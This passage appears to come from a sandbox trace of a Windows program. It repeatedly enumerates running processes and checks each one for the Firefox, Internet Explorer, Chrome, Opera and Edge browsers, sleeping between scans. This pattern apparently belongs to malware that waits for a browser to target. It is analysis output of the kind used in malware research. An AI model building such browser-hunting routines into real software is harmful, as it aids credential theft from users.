lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.622] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0227.622] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0227.622] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0227.622] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0227.622] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0227.622] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.622] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0227.623] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0227.623] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0227.623] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0227.623] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0227.623] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.623] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0227.623] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0227.623] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0227.623] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0227.623] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0227.623] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.623] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0227.624] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0227.625] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0227.625] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0227.625] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0227.625] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.625] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0227.625] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0227.625] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0227.625] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0227.625] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0227.625] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.625] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0227.626] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0227.626] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0227.626] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0227.626] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0227.626] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.626] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0227.626] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0227.626] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0227.626] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0227.626] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0227.626] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.626] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0227.627] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0227.627] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0227.627] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0227.627] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0227.627] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.627] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0227.627] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0227.627] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0227.627] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0227.628] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0227.628] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.628] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0227.628] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0227.628] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0227.628] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0227.628] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0227.628] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.628] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.629] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0227.629] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0227.629] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0227.629] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0227.629] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.629] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.630] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.630] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.630] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.630] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.630] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0227.630] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0227.630] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0227.630] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0227.630] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0227.631] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.631] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.631] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.631] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.631] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.631] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0227.632] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0227.632] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0227.632] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0227.632] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0227.632] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.632] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.633] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.633] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.633] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.633] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0227.633] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0227.633] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0227.633] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0227.633] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0227.633] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0227.633] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.634] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0227.634] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0227.634] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0227.634] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0227.634] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.634] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.634] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.634] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.634] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0227.634] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.635] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.635] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.635] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.635] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0227.635] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.635] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.636] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0227.636] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.636] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0227.637] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0227.637] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0227.637] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0227.637] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0227.637] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0227.637] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0227.637] CloseHandle (hObject=0xe8) returned 1 [0227.637] Sleep (dwMilliseconds=0x3e8) [0228.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0228.645] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.646] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0228.646] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0228.646] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0228.646] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0228.646] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0228.646] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.646] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0228.646] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0228.647] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0228.647] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0228.647] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0228.647] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.647] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0228.647] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0228.647] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0228.647] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0228.647] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.647] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.648] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0228.648] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0228.648] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0228.648] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0228.648] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.648] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.648] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0228.648] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0228.648] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0228.648] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0228.648] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.648] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.649] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0228.649] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0228.649] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0228.649] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0228.649] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.649] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.649] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0228.649] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0228.649] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0228.649] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0228.649] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.649] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.650] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0228.650] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0228.650] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0228.650] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0228.650] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.650] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.651] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0228.651] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0228.651] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0228.651] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0228.651] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.651] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.651] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0228.651] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0228.651] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0228.651] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0228.651] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.651] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.652] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.652] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.652] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.653] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.653] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.653] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.653] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.653] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.653] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 